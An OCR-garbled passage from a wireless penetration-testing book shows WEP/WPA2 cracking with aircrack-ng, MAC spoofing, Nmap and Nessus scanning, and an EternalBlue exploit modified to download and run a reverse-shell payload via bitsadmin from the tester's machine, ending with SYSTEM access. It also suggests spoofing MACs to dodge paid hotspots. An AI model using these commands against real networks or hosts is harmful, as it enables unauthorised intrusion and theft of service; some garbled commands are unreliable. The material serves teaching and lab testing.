e -a: This sets the access point MAC address 


e -h: This sets the source MAC address (00:11:22:33:44:55 is the spoofed MAC 
address) 


e --ignore-negative-one: This resolves the fixed channel on wlanO 


Figure 4.6: aireplay-ng command_1 


6. We will use aireplay-ng to intercept ARP packets on the wireless network and inject them 
back into it to imitate ARP answers. As indicated in Figure 4.7, we will run aireplay-ng in 
a separate window. We will generate a lot of data traffic on the network if we repeat these 
packets a few thousand times. Even though Aireplay-ng does not have access to the WEP 
key, it can detect ARP packets based on their size. Because ARP is a fixed header 
protocol, the size of ARP packets can be easily estimated and used to identify them even 
when the communication is encrypted. We will use aireplay-ng with the choices we will 
go over next. The -3 option is for ARP replay, the -b option is for our network’s BSSID, 
and the -h option is for the spoofing client’s MAC address. Replay attacks will only work 
for authorized and associated client MAC addresses, so we need to accomplish this, as 


shown in Figure.4.7: 
aireplay-ng -3 -b DC:EF:09:59:B1:1F -h 00:11:22:33:44:55 wlanOo 


Figure 4.7: aireplay-ng command_2 


7. Airodump-ng will also begin registering many data packets at this moment. The capture 
files contain all these intercepted packets. 


8. Let us start with the actual cracking! In a new window, we run aircrack-ng with the 
capture-01.cap option. This will launch the aircrack-ng program, which will begin 
cracking the WEP key using the data packets in the file. Airodump-ng should gather WEP 
packets, aireplay-ng should perform the replay attack, and aircrack-ng should attempt to 
crack the WEP key based on the collected packets all at the same time. All of them are 
open in distinct windows in this experiment. Press Enter after typing the following 


command, as shown in Figure 4.8: 
aircrack-ng capture-01.cap 


Figure 4.8: aircrack-ng command 


The number of data packets necessary to crack the key is nondeterministic; however, it is 
typically in the hundreds of thousands or more. This should take no more than 5-10 minutes on a 
fast network (or using aireplay-ng). If the current quantity of data packets in the file is 
insufficient, aircrack-ng will pause and wait for more packets to be collected; the cracking 
procedure will then be restarted. Aircrack-ng should be able to break the key once enough data 
packets have been gathered and analyzed. 


Congratulations on successfully cracking a WEP encrypted network if you were able to crack the 
network key! Do not be concerned if you do not succeed. Each wireless access point and 
network is unique. It also depends on the strength of the signal between you and the access point, 
as well as the level of encryption used. 


It is crucial to understand that WEP is completely defective, and Aircrack-ng can crack any WEP 
key (no matter how complex). The only need is that aircrack-ng has access to a big enough 
number of data packets encrypted with this key. 


Note: We can also use the Shared Key Authentication bypass approach we learned in the 
previous chapter to impersonate an authentication to the access point. If the legitimate 
client exits the network, this can be useful. This will allow us to spoof authentication and 
association while still sending our replayed packets into the network. 


WPA and WPA2 encryption 


The TKIP encryption algorithm is primarily used by WPA. TKIP was created with the goal of 
upgrading WEP without requiring fully new hardware. WPA2, on the other hand, uses the AES- 
CCMP encryption technique, which is far more powerful and robust than TKIP. 

Both WPA and WPA2 support EAP-based authentication via RADIUS servers (Enterprise) or a 
Pre-Shared Key (PSK)-based authentication schema (Personal). 

A dictionary attack can be used against WPA/WPA2 PSK. The four-way WPA handshake 
between the client and access point, as well as a wordlist of common passphrases, are necessary 
for this attack. We may next try to crack the WPA/WPA2 PSK pass using tools like Aircrack-ng. 


The four-way handshake is depicted in Figure 4.9: 
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Figure 4.9: WPA/WPA2 authentication diagram 


The Pairwise Transient Key (PTK) is calculated using the PSK and five other parameters: 
SSID of Network, Authenticator Nounce (ANounce), Supplicant Nounce (SNounce), 
Authenticator MAC address (Access PointMAC), and Suppliant MAC address (Wi-Fi Client 
MAC). The data between the access point and the client is then encrypted using this key. 


All five factors described in the previous paragraph can be obtained by an attacker smelling the 
air and listening to the entire conversation. The PSK is the only thing he lacks. So, how does a 
PSK get made? It is calculated by combining the WPA-PSK pass and the SSID provided by the 
user. The Password-Based Key Derivation Function (PBKDEF2) is used to generate the 256-bit 
shared key from the combination of both. 


The attacker would employ a big dictionary of possible passphrases with the attack tool in a 
standard WPA/WPA2 PSK dictionary assault. The tool would generate the PTK by extracting 
the 256-bit PSK from each of the passphrases and combining it with the other parameters 
specified earlier. One of the handshake packets’ Message Integrity Check (MIC) will be 
verified using the PTK. If the pass from the dictionary matches, the guess was accurate; if not, it 
is incorrect. 


If the authorized network passphrase is found in the dictionary, it will eventually be identified. 
This is how PSK is cracking for WPA/WPA2 works! The steps are illustrated in Figure 4.10: 
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Figure 4.10: WPA/WPA2 dictionary attack 
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We will see how to break into a WPA PSK wireless network. To breach a WPA2-PSK network 
using CCMP(AES), the same techniques must be followed. 


Cracking WPA-PSK and WPA2-PSK passphrase 


To get started, simply follow the provided instructions. 


1. Let us first connect to our Wireless Lab access point and configure it to use WPA2-PSK 
[AES]. We will change the WPA2-PSK [AES] password to abedefgh to make it 
vulnerable to dictionary attacks, as shown in Figure 4.11: 
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Figure 4.11: Netgear router setting 


2. Type the following command into the Terminal: 
airmon-ng start wlano 


The wlano interface will be started in monitor mode with this command, as shown in 
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Figure 4.12: airmon-ng command 


Press Enter after typing the following command: 
airodump-ng wlano 


We will be able to inject packets into a wireless network because of this, as shown in 


Figure 4.13: airodump-ng command_1 


Press Enter after typing the following command, as shown in : 
airodump-ng -c 11 -w wpacracking --bssid DC:EF:09:59:B1:1F wlano 


Figure 4.14: airodump-ng command_2 


. We can either wait for a fresh client to connect to the access point so that we can capture 
the four-way WPA2 handshake or we can force clients to re-join by sending a broadcast 
deauthentication packet. To make things go faster, we do the latter. With the unknown 
channel error, the same thing can happen. Use --ignore- negative: -one once more. This 


may necessitate multiple attempts, as shown in 
aireplay-ng --deauth 1 -a DC:EF:09:59:B1:1F wlan --ignore-negative-one 


OC: EF:69 Bares 1F wlane 
F:69:59:B1:1F) on channel 11 


OC ;EF:69:59:81:1F 


Figure 4.15: aireplay-ng command 


6. When we capture a WPA2 handshake, the airodump-ng program will display a WPA2 
handshake followed by the access point’s BSSID in the top-right corner of the screen. If 
you choose - ignore-negative-one, the tool may send a fixed channel message instead 
of the WPA2 handshake. Keep a lookout for a WPA2 handshake that flashes briefly. 


7. We can now terminate the airodump-ng utility. Let us look at the four-way handshake in 
Wireshark by opening the cap file. Figure 4.16 shows how your Wireshark terminal 
should look. In the snapshot, we have selected the first packet of the four-way handshake 
from the trace file. The EAPOL protocol is used in the handshake packets, as seen in 
Figure 4.16, where the handshake does not contain data that helps recover the key but 
contains data that can be used to check if a key is valid or not. 
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Figure 4.16: Wireshark 


8. Now, we will start with the real key cracking! We will need a glossary of common words 
for this. Many dictionary files are included in Kali’s Metasploit folder, as illustrated in 
Figure 4.17. It is vital to remember that you are only as good as your dictionary when it 
comes to WPA2 cracking. Kali comes with a few dictionaries, but they may not be 
enough. People’s passwords are influenced by a variety of factors. This contains 
information such as the users’ home nation, prevalent names and phrases in that region, 
security knowledge, and a variety of other factors. When doing a penetration test, it is a 
good idea to combine country- and region-specific wordlists, as shown in Figure 4.17: 


Figure 4.17: Metasploit 


9. As demonstrated in Figure 4.18, we will use the aircrack-ng software with the peap file as 


the input and a link to the dictionary file as the output. As displayed in the terminal, I used 
nmap. 1st: 

aircrack-ng wpacracking-05.cap -w /usr/share/wordlists/nmap.1st 

The dictionary file is used by aircrack-ng to test various combinations of passwords to 
crack the key. If the password is in the dictionary file, it will be cracked eventually, and 
your screen will look like the one in Figure 4.18: 


EAPOL HMAC 11 D6 71 EO 44 70 F 4F 51 AB 2D DF DA 


Figure 4.18: aircrack-ng command 


10. Please keep in mind that because this is a dictionary attack, the password must be present 
in the dictionary file you submit to aircrack-ng. The attack will fail if the pass is not found 
in the dictionary! 


We feed the capture file containing the WPA2 four-way handshake and a list of common 
passphrases (in the form of a wordlist) to Aircrack-ng because WPA2-PSK is vulnerable 
to a dictionary attack. Aircrack-ng can crack the WPA2-PSK shared pass because the 
pass abcdefgh is contained in the wordlist. It is worth repeating that you are only as good 
as the dictionary you have in WPA2 dictionary-based cracking. As a result, it is critical to 
start by compiling a vast and detailed lexicon. Even though Kali comes with its own 
vocabulary, it may be insufficient at times and require additional words. 


Speeding up WPA and WPA2 Cracking 


As we saw in the last section, if we have the right password in our dictionary, breaking WPA2- 
Personal is a piece of cake. So, why do we not simply compile a massive dictionary of millions 
of commonly used passwords and phrases? This would be extremely beneficial to us, and we 
would almost always succeed in cracking the password. Everything sounds fantastic, but there is 
one thing missing: the time spent. The Pre-Shared key using the PSK pass and the SSID through 
the PBKDF2 is one of the more CPU and time-consuming calculations. Before returning the 
256-bit Pre-Shared key, this function hashes the combination of both over 4,096 times. The next 
stage in the cracking process is to use this key, along with parameters from the four-way 
handshake, to verify the handshake against the MIC. This is a low-cost computational phase. 
Furthermore, the characteristics of the handshake will vary from time to time; therefore, this 
phase cannot be pre-calculated. As a result, to speed up the cracking process, we must calculate 
the Pre-Shared key from the pass as quickly as feasible. 


Pre-calculating, the Pre-Shared Key, also known as the Pairwise Master Key (PMK) in 802.11 
standard jargon, can help speed things up. It is worth noting that because the SSID is also used to 
calculate the PMK, we will get a different PMK if we use the same pass but a different SSID. As 
a result, the PMK is dependent on both the passcode and the SSID. 


Speeding up the cracking process 


We can go ahead and do the following: 


1. Using the genpmk tool, we can compute the PMK for a given SSID and wordlist ahead of 
time: 
genpmk -f <chosen wordlist> -d PMK-Wireless-Lab -s “Wireless Lab” 
This generates the PMK-Wireless-Lab file, which contains the PMK, as can be seen in 


Figure 4.19: 


Figure 4.19: genpmk command 


2. We will now build a WPA-PSK network with the passphrase abcdefgh (found in the 
dictionary) and capture a WPA handshake for it. As illustrated in the accompanying 


Figure 4.20, we now use Cowpatty to crack the WPA passphrase: 
cowpatty -d PMK-Wireless-Lab -s “Wireless Lab” -r wpacracking-05.cap 


Figure 4.20: Cowpatty command 


Cowpatty uses the pre-calculated PMKs to crack the key in approximately 6 seconds. 


3. With the same dictionary file, we now run aircrack-ng, and the cracking operation takes 
almost 22 minutes. This demonstrates how much we gain because of the pre-calculation. 


4. We will need to use a tool named airolib-ng to use these PMKs with aircrack-ng. as the 
following: 
airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab 
Where PMK-Aircrack is the aircrack-ng compatible database to be built, and PMK- 
Wireless-Lab is the previously created genpmk-compliant PMK database. Refer to Figure 
4.21: 


Figure 4.21: airolib-ng command 


5. We now feed this database to aircrack-ng, which significantly speeds up the cracking 


process. The following command is used, as shown in Figure 4.22: 
aircrack-ng -r PMK-Aircrack wpacracking-05.cap 
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Figure 4.22: aircrack-ng command 


6. Additional Kali tools, like Pyrit, can make use of multi-processor platforms to speed up 
cracking. Intel® CoreTM i7 CPUs, for example, can do faster cracking operations. The -r 
option specifies the peap filename, whereas I specify the genpmk-compliant PMK file. 
Pyrit takes roughly 3 seconds to break the key on the same system as the preceding tools, 
using the same PMK file prepared using genpmk. 


In addition to the aforementioned factors, the length of the WPA/WPA2 PSK plays a 
major role in the cracking process. The cracking of longer passes takes longer. 


Spoofing your mac address 


You might be aware that MAC address filtering is not entirely secure. It is much less effective 
than WEP encryption, in my opinion, because it is trivial to forge. This is not to say that MAC 
address filtering is not useful. It does filter out many attackers who are only interested in the 
weakest link networks. Whatever you do, do not rely just on MAC filtering! WEP encryption is 
preferable to no encryption. Refer to Figure 4.23 for an illustration of MAC Spoofing: 
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Figure 4.23: MAC spoofing 


This does not necessitate a high level of competence. All you must do is listen in on wireless 
network traffic and change your MAC address to someone who is already connected. Changing 
your MAC address is as simple as 1, 2, and 3 with automation scripts or applications. Then, 
using an application called macchanger, let us see how we can spoof our MAC address. 


1. Open the Terminal. 


2. Press Enter after typing the following command: 
ifconfig wlan® down 


This command disables or turns off the wireless interface, as shown in Figure 4.24: 


/ 
wlan® down 


Figure 4.24: ifconfig wlan0 down command 


3. To reactivate wlano, use the following command and press Enter, as shown in Figure 


4.25: 
ifconfig wlanO up 


/ 
wlanOd up 


/ 


Figure 4.25: ifconfig wlan0 up command 


4. Press Enter after typing the following command: 
macchanger --random wlanO 


This command generates a fake MAC address for the wireless interface at random, as 
shown in Figure 4.26: 


5. 


® / 


wlan® down 


® / 


wland 
Current MAC: fe:eb:d4:4f:9d:51 (unknown) 
Permanent MAC: lc:bf:ce:89:8c:e2 (unknown) 
New MAC: 42:0c:e0:20:d3:71 (unknown) 


Figure 4.26: macchanger command_1 


Press Enter after typing the following command: 

macchanger --mac=00:11:22:33:44:55 wlanOo 
As displayed, this command allows you to fake a MAC address on the wireless interface, 
as shown in Figure 4.27: 


@ / 
wlan@ 
Current MAC: 42:0c:e0:20:d3:71 (unknown) 
Permanent MAC: lc:bf: c:e2 (unknown) 


New MAC: 00:11:22:32 4:55 (CIMSYS Inc) 


/ 
a 


Figure 4.27: macchanger command_2 


It is as simple as that! Is it not simple? Knowing this can help you avoid paid hotspot networks 
where you must pay money for a long period of time. These networks will be available in coffee 
shops, restaurants, airports, and hotels. When a user pays, their MAC address is added to the list 
of permitted MAC addresses for internet access. 


Protect yourself from wireless attacks 


We must always be aware of how to defend ourselves against such dangers and attacks. 


Following that, we will go over ways to defend yourself against these attacks: 


Encryption that is more robust reduces the likelihood of an attack. 
MAC filtering can also help to lessen the chances of an attack. 


If your devices are not compatible with WPA/WPA2, you can use WEP instead; however, 
it is not suggested because it is insecure. 


To restrict access to a business network, create a distinct VLAN. 
WPS settings should be disabled or turned off. 

Make a strong, complicated passphrase. 

Passwords should be changed every three to four months. 

Use the manufacturer’s default passwords only as a last resort. 
Instead of PSK, use EAP. 

Change the SSID name that comes up by default. 


Conclusion 


We put prepared an offensive plan in this chapter. Following that, we outlined many attack 
methods. Then we went through the details of WEP, WPA, and WPA2 encryption. Finally, we 
outlined a few strategies for reducing the likelihood of a wireless attack. 


In the upcoming chapter, we will look at how to identify hosts on a wireless network, figure out 
how big it is, and spot susceptible devices and systems on it. Let us start! 


uestions 


Explain the WEP encryption? 

How do you crack the WEP encryption? 

Explain the WPA/WPA2 encryption? 

How crack the WPA/WPA2 encryption? 

How do you protect yourself from wireless attacks? 
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CHAPTER 5 


Gain Access to Wireless Network 


Introduction 


We have arrived at the fifth chapter! In this chapter, we will cover a variety of topics related to 
having network access as a wireless penetration tester. We will conduct network evaluations to 
identify hosts, calculate network size, and identify vulnerable hosts. When doing a penetration 
test, it is a good idea to know how many hosts are on the network because you do not want to 
leave anything out. Let us start by talking about why this is so crucial. 


Structure 


In this chapter, we will discuss the following topics: 


e Identifying hosts 
e Determining network size 
e Detecting vulnerable hosts 


e Preventing against threats 


Objectives 


In this chapter, you will understand why it is important to find the number of live hosts when 
conducting a penetration test on a network. Next, you will be identifying hosts on the network 
with Kali Linux. Then, you will determine network size and explain why it is important to 
understand as a penetration tester. In the end, you will be able to detect vulnerabilities in 
Windows 7 using the Nessus vulnerability scanner, and you will able also to use several 
preventions that could help reduce risk. 


We need to know if there is a client on the network that is running Windows 7. The user 
understands they are in danger because they are running an outdated version of Windows. In a 
matter of minutes, Windows 7 can be hacked! Microsoft stopped supporting Windows 7 in 
January 2020. Because Windows 7 is no longer maintained, attackers will flock to this version of 
the operating system in quest of flaws. The reason for this is that Microsoft will no longer offer 
security patches, which means that if an attacker discovers a hole in the system, it will remain 
susceptible indefinitely. 


We will use a variety of networking tools to figure out how many hosts are on the network, what 
operating system they are running, how big the network is, and which ones are vulnerable. 
Knowing what parts of the network are susceptible and then applying security patches or 
upgrades will help to improve security. Keep in mind that not only the systems and equipment in 
your business are vulnerable but also the people! 


This is certainly one of the most serious security threats one encounter. Your employees should 
go through a security awareness program to learn about the good and bad, as well as the dos and 
don’ts. You may also have employees that share consumer information outside of the workplace 
for financial advantage. Keep a watch out for any unusual conduct that could jeopardize the 
company’s operations. 


Identifying hosts 


This section covers the various tools available for identifying hosts on a network. These 
programs will provide a user’s IP address, MAC address, open and closed ports, services, 
operating system, and other details. The following sections contain a list of Kali Linux tools that 
can be used to identify hosts on a network. 


Network mapping tools 


The command-line interface of Nmap will be the center of our attention. Here are some 
alternative network mapping tools to consider: 


e Otrace 

e Angry IP scanner 

e hping2 and hping3 

e janmap and lanmap2 

e TCP traceroute 
You will learn how to use Nmap to identify hosts on a network in this tutorial. When it comes to 
network discovery or determining whether a network service, such as Telnet, SSH, or FTP, is 
running, these tools are by far my favorites. Let us get started! 

1. Open the Terminal 


2. Press Enter after typing the following command: 
Ifconfig 


In this case, our private IP address is 192.168.1.128, as shown in Figure 5.1. Because our 
gateway is 192.168.1.1, we will see how to scan the entire subnet next. 


Figure 5.1: Ifconfig command 


3. Press Enter after typing the following command: 
nmap 192.168.X.0/24 


This command initiates a ping sweep on all hosts on the 192.168.1.1 through 
192.168.1.254 range. You will notice some intriguing information in your output, such 
as open and closed ports, services, and the operating system they are using. 


We can detect multiple systems and devices on the local network, as shown in 


& / 

192.168.1.0/24 

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-13 15:14 EST 
Nmap scan report for 192.168.1.1 

Host is up (8.00019s Latency). 

Not shown: 993 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

443/tcp open https 

445/tcp open microsoft-ds 

808/tcp open ccproxy 

962/tcp open iss 

912/tcp open apex 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 192.168.1.2 

Host is up (0.00033s latency). 

Not shown: 999 closed ports 

PORT STATE SERVICE 

53/tcp open domain 

MAC Address: 00:50:56:E3:E5:DE (VMware) 


Nmap scan report for 192.168.1.129 

Host is up (0,.60025s latency). 

ALL 1000 scanned ports on 192.168.1.129 are filtered 
MAC Address: 00:0C:29:C9:EF:96 (VMware) 


Nmap scan report for 192.168.1.254 


Figure 5.2: nmap command 


4. If you have a firewall installed on your network, run the following command: 
nmap -PN 192.168.X.0/24 


All hosts will be treated as online, and host discovery will be skipped. It is used to get 
beyond standard firewall filters to see if the firewall is up and running, as shown in 


All addresses will be marked ‘up’ 
map.org ) at 2022-01-13 15:19 EST 


D open 
> open 


2.168.1.129 are filtered 
796 (VMware) 


Nmap scan report for 192.168.1.254 


Figure 5.3: nmap command_2 


Determining the network size 


It is not difficult to figure out how big your network is. It will be a lot easier if you already have 
some networking experience. Let us walk through a few steps to figure out how big the network 
is and how many hosts we have. 


Determining the network size using Kali Linux 


We will determine the network size in Kali Linux in this tutorial. To do so, follow the given 
steps: 


1. Open the Terminal. 


2. Press Enter after typing the following command: 
Ifconfig | grep mask 


Figure 5.4 is the output: 


¢ / 

mask 
inet 192.168.1.128 net 255.255.255.8 broadcast 192.168.1.255 
inet 127.0.0.1 net 255.6.8.0 


Figure 5.4: ifconfig command_2 


To go to your network configuration, you will need to scroll up and down. In Figure 5.4, the 
subnet mask is 255.255.255.0. If we do some subnetting math, we can figure out that this 
network might have somewhere between 1 and 254 hosts. 


What does establishing the network size have to do with penetration testing, you might wonder? 
The penetration tester can estimate the number of hosts on a network by determining the network 
size. When the number of networks in a data center or college campus is known, this can make a 
penetration test easier. 


This section is rather self-explanatory. If you know someone who does not update their system 
daily, they are certainly vulnerable to the most recent security risks. As of right now, Windows 7 
is extremely insecure, especially if the user has not installed any updates or service packs. Let us 
see a vulnerability in Windows 7 in the upcoming example. 


Let us look at the steps: 


1. Scanning the target for services in use, as shown in 


Figure 5.5: nmap command_3 
OS detection, version detection, script scanning, and traceroute are all possible with this 
command. 


2. Use Nessus to scan for vulnerabilities. (If you are running Nessus for the first time, please 
note that you will need to register Nessus first.) 


3. We provided the IP address of the host we are going to scan for vulnerabilities in the 
following, as shown in F : 


Figure 5.6: Nessus_1 


4. We are now ready to click Launch to begin our Nessus scan, as illustrated in 


Figure 5.7: Nessus_2 


5. After the scan is completed, we must examine the report, as shown in 


Figure 5.8: Nessus_3 


6. As you can see from our findings, there are various services that are vulnerable, as shown 
in : 


Figure 5.9: Nessus_4 


When you select one of them and look at the name of the plugin, you will see MS17-010. 
We will use this later to locate our exploit. 


7. Let us start looking for our exploit. Use the following command to start a fresh Metasploit 


console, and refer to 
msfconsole 


/home/kali/Desktop 


HHRRHAHERHRAATHTARARKL ST 
## ## #e #2 


Figure 5.10: msfconsole command 


is where you can get the 
Metasploit Framework. H. D. Moore created the Metasploit Framework in 2003 as an 
open-source attack framework. It is used to break into systems and gadgets for the 
purpose of testing. It contains information for penetration testers, IDS signature 
developers, and exploit researchers. 


8. Type the following into your search engine to find our exploit: 
search msi7 


The result is shown in Figure 5.11: 


Figure 5.11: msfconsole command_2 
9. Complete the following commands: 
e use  exploit/windows/smb/ms17_010_eternalblue: This command _ sets 


Metasploit Framework to use the exploit ms17_010_eternalblue 


e set RHOST 192.168.1.129: This command sets the remote host to the user whom 
you are exploiting. 

e set PAYLOAD windows/x64/meterpreter/reverse_tcp: This command sets the 
payload to reverse_tcp so that we can connect back to the host after the exploit 
was successful. 

e set LHOST 192.168.1.128: This command sets the localhost, which is the Kali 
Linux host’s IP address. 


e exploit: This command launches the exploit in real time so you can see the details 
in action. 


10. Use the command: if you want to run a different payload: 
show payloads 


The output of the commands we entered previously can be seen in Figure 5.12: 


Figure 5.12: msfconsole command_3 


Unfortunately, the exploit is not run correctly because it supports 64 targets only, and 
our target is x86. Now, we will use another tool to exploit our target, such as the 
searchsploit tool, as shown in Figure 5.13: 


/home/kali/Desktop 


Figure 5.13: searchsploit command 


11. Enter the following command, and refer to Figure 5.14: 
searchsploit msi7-010 


/home/kali/Desktop 
msl7-61 


/home /kali/Desktop 


Figure 5.14: searchsploit command_2 


12. Before we proceed, we should make a copy of this file so that we can access the original 
source code. To keep things simple, we can rename it exploit.py, as shown in Figure 
5.15. We will enter the following command to get the full path of the exploit: 

searchsploit -p windows/remote/42031.py 


Then, we will enter the following command to copy the exploit: 
cp /usr/share/exploitdb/exploits/windows/remote/42031.py exploit.py 


home/kali/Desktop 


hone/kali/Desktop 


Figure 5.15: Copy command 


13. We may now edit the Python file and check the supported targets, as shown in Figure 
3.16: 


Figure 5.16: Exploit file 


14. Now, we can try to run the exploit, as shown in Figure 5.17: 


root@ kali /home/kali/Desktop 
# exploit.py 
Traceback (most recent call last): 
File "exploit.py", line 2, in <module> 
from impacket import smb 
ImportError: No module named impacket 


root@ kali /home/kali/Desktop 
a 


Figure 5.17: exploit output 


There is an error (no module named impacket) which means that impacket package is not 
installed. So, we will run the following command to fix this error, as shown in Figure 


5.18. 
sudo python2 -m pip install impacket 


home/kali/Desktop 
pip insta my 


P 


Figure 5.18: Install impacket module 


15. Now, we can try to run the exploit again, as shown in Figure 5.19: 


16. 


17. 


» [numGroc 


/home/kali/Desktop 


Figure 5.19: Run exploit.py 


The exploit seems to work correctly, but it needs a target IP, shellcode_file, and 
numGroomConn, where our target IP is 192.168.1.129, and we can create shellcode_file 


using msfvenom tool as shown in Figure 5.20. 
msfvenom -a x86 --platform windows -p windows/shell/reverse_shell 
LHOST=192.168.1.128 LPORT=4444 > shellcode 


Figure 5.20: msfvenom command 


And numGroomConn is an optional parameter that, by default, has the value 13. It is used in 
the EternalBlue exploit script for the buffer overflow attack. If the exploit fails, but the 
target does not crash, then try increasing the numGroomConn value. 


Currently, we can try to run the exploit with the given parameters, as shown in Figure 
5.21; 


/home/kali/Desktop 


yy 192.168.1.129 shellcode 25 


numGr 
arget OS: 


ree 


ib/python2.7/d packages/impacket/smb.py", 


s/impacket/smb.py", line 2 


es/impacke 


ing read 


/home/kali/Desktop 


Figure 5.21: Exploit output 
Although the script did not work in the end, the debugging methods were instructive. 
Now, we will go back to Step 11 and select another exploit, such as 42315. py, to try it. 


Repeat Step 12. Now, we can open the exploit and enter a valid username and password of 
our target, as shown in Figure 5.22: 


Figure 5.22: Exploit file 


18. Now, we can try to run the exploit, as shown in Figure 5.23: 


root@ kali /home/kali/Desktop 
¥ exploit. py 
Traceback (most nt call last): 
File “exploit.py”, line 3, in <module> 
from mysmb import MYSMB 
ImportError: No module named mysmb 


root@ kali /home/kali/Desktop 
a 


Figure 5.23: Run exploit file 


There is an error (No module named mysmb) which means that mysmb package is not 


installed. So, we will run the following command to fix this error (see Figure 5.24): 
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb. py 


/hone/kali/Desktop 


Figure 5.24: Install mysmb module 


19. Try running the file again, and we get a different output, as shown in Figure 5.25: 


root@ kali /home/kali/Desktop 


or exploit.py 
exploit.py <ip> [pipe name] 


root@ kali /home/kali/Desktop 
a 


Figure 5.25: Run exploit file 


It looks like usage information now, which is a good sign. We need to plug in the IP 


address of our target and a pipe name as parameters. 


20. Find Named Pipe: Named pipes are a low-overhead technique for running processes to 
communicate with one another. Pipes are often presented as files to which other processes 
can attach. A scanner in Metasploit will detect any named pipes on a host. To open anew 


terminal, type msfconsole and then search for the scanner, as shown in 
Msfconsole 
search pipe 


Figure 5.26: msfconsole command 


The one we want is the pipe_auditor. Load the module with the use command. 
use auxiliary/scanner/smb/pipe_auditor 


You should see the aunt eiacy(ceanney/sin/p pes auditor) > options prompt. Now, 
we can look at the options, as shown in 


Figure 5.27: msfconsole command_2 
All we really need to do is specify the IP address of our target (192.168.1.129) see 
msf6 auxiliary( ) > set RHOSTS 192.168.1.129 


RHOSTS => 192.168.1.129 
msf6 auxiliary( ) > run 


{*] 192.168.1.129: - Scanned 1 of 1 hosts (100% complete) 
{*} Auxiliary module execution completed 


Figure 5.28: msfconsole command_3 


It looks like it no found named pipes. 
21. Run the exploit file. We should be able to launch the exploit file at this point. Use the 


22, 


target’s IP address, as shown in 


@ /home/kali/Desktop 
exploit.py 192.168.1.129 
Target OS: Windows 7 Ultimate 7601 Service Pack 1 
Using named pipe: samr 
Target is 32 bit 
Got frag size: 0x8 
GROOM POOL SIZE: 0x5026 
BRIDE TRANS SIZE: Oxfc8 
CONNECTION: 0x8698e708 
SESSION: 0x960e3758 
FLINK: O0x828cf050 
InParam: 0x828c96dc 
MID: 0x3603 
success controlling groom transaction 
modify transl struct for arbitrary read/write 
make this SMB session to be SYSTEM 
overwriting session security context 
creating file c:\pwned.txt on the target 
Done 


® /home/kali/Desktop | 


Figure 5.29: Exploit output 


So that was successful! We do not know if the file was generated because it is on the 
system rather than on the SMB share. As a result, we ae need to change the exploit. We 
must first build a she11. exe file, as shown in 


(howe/ kali/Desktop 


Figure 5.30: msfvenom command 


Now, we can start the Apache server so the exploit can connect to our machine from the 
target to reach the payload. Next, we will tweak the code to fit our needs. 

sudo systemctl start apache2 
Modify the code: Back in amtott: py, find the section of code near the bottom that looks 
like as shown in 


Figure 5.31: Modify exploit file 


Here, we can see the code that is responsible for connecting to the target and creating the 
text file. We can also see an interesting-looking function called service_exec() which is 
commented out. That will connect to the target and issue a command to copy the 
previously created text file into a new text file named pwned_exec.txt on the c drive. We 
can use this function to grab our payload and execute it on the target. 


23. 


First, uncomment the function and replace everything after cmd /c with the following 
command: 

bitsadmin /transfer pwn /download http://192.168.1.128/sc.exe C:\sc.exe 
Background Intelligent Transfer Service (BITSAdmin) is a Windows command-line 
tool used to upload or download files. The /transfer switch initializes a transfer (with 
the name pwn in this case), and /download specifies that it is a download. Then, we enter 
the name of the remote file (being hosted on our machine) and the name of the local file 
once it is transferred. 


Next, add another service_exec() function and have it execute the file we just 
transferred. The code will look like this: 

service_exec(conn, r’cmd /c /sc.exe’ ) 

Finally, we can comment on the section that creates a text file because we really do not 
need it anymore. The final code should look like as shown in Figure 5.32: 


Figure 5.32: Final exploit file after modifying the code 


Now, all we have left to do now is run the exploit. 


Run the finished exploit: To complete the exploit, we need something to catch the shell 
once the payload executes. We can use the multipurpose handler in Metasploit for this. In 
a new terminal, use the following commands: 


msfconsole 
use exploit/multi/handler 


You should see the exploit (multi/handler) prompt. We just need to set the payload to 
match whatever we specified when we created the shellcode earlier, which in this case, is 
a reverse TCP shell. 

set payload windows/shell/reverse_tcp 

Next, set the appropriate listening host: 

set lhost 192.168.1.128 

And the listening port: 

set lport 9001 


And we can start the handler: 
Run 


The output of the commands we entered previously can be seen in Figure 5.33: 


Figure 5.33: msfconsole commands 


It will listen for any incoming connections, and if everything goes smoothly, we will get a 
Meterpreter session once our exploit completes. 


Finally, we should have everything in place and ready to go. We can launch the exploit 
just like we did earlier in our test run from within the exploit directory, as shown in 


python exploit . py 192.168.1.129 


/home/kali/Desktop 
t.py 192.16 
7 Ultimate 


t, diff: 6x136a2650 
ain 
8 


. Giff: 8x11056 
ain 


t, diff: @x6b050 
try again 


Figure 5.34: Run exploit 


This time we should see different results. Ignore the errors, and if it does not work the first 
time, just try again. Once the exploit Sac ees uy completes, we should see a session open 


back on our listener, as shown in 


Figure 5.35: msfconsole output 


We can verify we have compromised the target with the whoami command, as shown in 


C:\Windows\system32>whoami 
whoami 
nt authority\system 


C:\Windows\system32>§J 


Figure 5.36: whoami command output 


Congratulations! Over a wireless network, we were able to detect and exploit a susceptible host. 


Preventing against threats 


We must always be aware of how to defend ourselves against these threats and attacks. After 
that, we will go over how to defend ourselves against these attacks. 


Prevention identification of hosts 


Small and large enterprises should have a hardware firewall, such as the WatchGuard XTM, 
Cisco ASA, or Next Generation Firewalls such as FortiGate, Palo Alto, and Checkpoint, with 
custom rules to block services and ports that are not in use to protect themselves from threats and 
dangers. To prevent unwanted access, services that are not in use should be disabled on the 
server or network device. Intrusion detection systems with SMS or e-mail alerting capabilities. 
Protocols should be logged, and alerts should be flagged by the firewall. 


How would you know if your organization has been hacked if the firewall or IDS is not being 
monitored? It is critical to monitor your network daily if you want to keep ahead of threats and 
problems. VLANs can be used to separate your networks. To keep the network safe from 
network viruses and compromise, each server, workstation, VoIP, and wireless device should 
have its own VLAN. 


Preventing others from determining your network size 


Any sensitive information, including network diagrams, passwords, logs, workstation and server 
information, and configuration settings, should always be encrypted when evaluating network 
size. Small and large enterprises can use a hardware firewall such WatchGuard XTM or Cisco 
ASA to regulate traffic by blocking ICMP and only permitting traffic from trusted sources. 


Protection of vulnerable hosts 


Install the latest security updates offered by your vendors to safeguard your computers and 
network devices from exploitation. When new operating systems and software updates become 
available, install them. If you run into problems while upgrading, contact your program vendor. 
Use the most secure Wi-Fi encryption, WPA2 or WPA3, which uses the AES encryption 
technique and a long password. On all your workstations and servers, run a real-time antivirus 
